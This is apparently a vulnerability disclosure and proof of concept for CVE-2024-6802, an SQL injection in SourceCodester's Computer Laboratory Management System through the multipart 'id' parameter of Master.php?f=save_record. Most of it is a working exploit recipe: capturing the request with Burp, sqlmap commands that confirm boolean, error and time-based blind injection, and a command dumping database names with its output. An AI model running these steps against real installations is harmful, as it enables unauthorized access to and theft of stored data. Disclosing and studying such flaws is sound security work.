CVE-2024-6802
Details
Attack type: SQL injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Vendor: SourceCodester
Product: Computer Laboratory Management System
Affected components: /lms/classes/Master.php?f=save_record
Injection parameter:MULTIPART id
POC
Intercept the request using Burpsuite Proxy.
Save the request to save_record.txt
The vulnerability can be verified with the following command:
sqlmap -r save_record.txt --batch
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"
Databases can be dumped using the following command:
sqlmap -r save_record.txt --batch --dbs
[02:45:07] [INFO] fetching database names
[02:45:07] [INFO] retrieved: 'information_schema'
[02:45:07] [INFO] retrieved: 'lms'
available databases [2]:
[*] information_schema
[*] lms